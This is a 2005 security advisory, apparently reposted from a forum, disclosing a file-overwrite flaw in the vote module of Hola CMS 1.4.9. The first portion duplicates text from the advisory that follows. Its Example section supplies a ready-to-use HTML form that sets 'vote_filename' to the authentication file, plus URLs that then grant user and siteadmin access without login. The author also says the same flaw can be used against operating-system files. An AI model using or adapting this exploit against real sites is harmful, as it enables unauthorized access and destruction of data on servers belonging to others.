I found a serious security hole in Hola CMS:
The Vote-Module doesn't check wether the submitted "vote_filename" variable
is in the holaDB/votes/ directory where it should be.
So anything could be added in there. This can be used to manipluate or destroy system files
- not only the ones in the CMS but every file on the whole server!!!
Below i will show an example how to destroy login-authentification file and gaining access
to admin-functions!
Of course you'll have to edit [target] and [site-with-vote] to match your site!
Now when you push the button the first lines of the multiuser.php (which
includes the authentication mechanism) get overwritten and by calling
http://[target]/admin/index_cms.php
you have access to all user functions.
by calling
http://[target]/admin/[module you want].php?username=siteadmin
to all siteadmin functions!
But thats just for that lame CMS... of course you could attack operating-system files
or do other funny things. NO! Please don't do it! Just test on your own system :P
- - - --------------------------------------------------------------------
Solution:
Author wasn't nice last time so no more help for this piece of vuln software.
But i strongly reccomend you to use some other software since there are
still many other vulns in it!
So you thought this girl couldn't do it anymore? Here it goes... read and enjoy!
For contact please don't mail me cuz my mailbox is full of spam :(
But if you want to find me on IRC you'll make it!
- - - --------------------------------------------------------------------
Virginity Security Advisory 2005-001
- - - --------------------------------------------------------------------
DATE : 2005-03-12 15:45 GMT
TYPE : remote
VERSIONS AFFECTED : <== hola-cms-1.4.9 (http://holacms.drunkencat.net/)
AUTHOR : Virginity
ADVISORY NUMBER : 003
- - - --------------------------------------------------------------------
Description:
I found a serious security hole in Hola CMS:
The Vote-Module doesn't check wether the submitted "vote_filename" variable
is in the holaDB/votes/ directory where it should be.
So anything could be added in there. This can be used to manipluate or destroy system files
- not only the ones in the CMS but every file on the whole server!!!
Below i will show an example how to destroy login-authentification file and gaining access
to admin-functions!
Author of the Software has been notified.
- - - --------------------------------------------------------------------
Example:
Create this html form (that makes it easier to use it on multiple targets):
<form action="http://[target]/[site-with-vote].php?vote=1" method="POST">
<input type="hidden" name="vote_filename" value="admin/multiuser/multiuser.php">
<input type="hidden" name="result" value="0">
<input type="submit" value="Stimme abgeben" name="button">
</form>
Of course you'll have to edit [target] and [site-with-vote] to match your site!
Now when you push the button the first lines of the multiuser.php (which
includes the authentication mechanism) get overwritten and by calling
http://[target]/admin/index_cms.php
you have access to all user functions.
by calling
http://[target]/admin/[module you want].php?username=siteadmin
to all siteadmin functions!
But thats just for that lame CMS... of course you could attack operating-system files
or do other funny things. NO! Please don't do it! Just test on your own system :P
- - - --------------------------------------------------------------------
Solution:
Author wasn't nice last time so no more help for this piece of vuln software.
But i strongly reccomend you to use some other software since there are
still many other vulns in it!
- - - --------------------------------------------------------------------
Personal note:
So you thought this girl couldn't do it anymore? Here it goes... read and enjoy!
For contact please don't mail me cuz my mailbox is full of spam :(
But if you want to find me on IRC you'll make it!
- - - --------------------------------------------------------------------
[ reply ]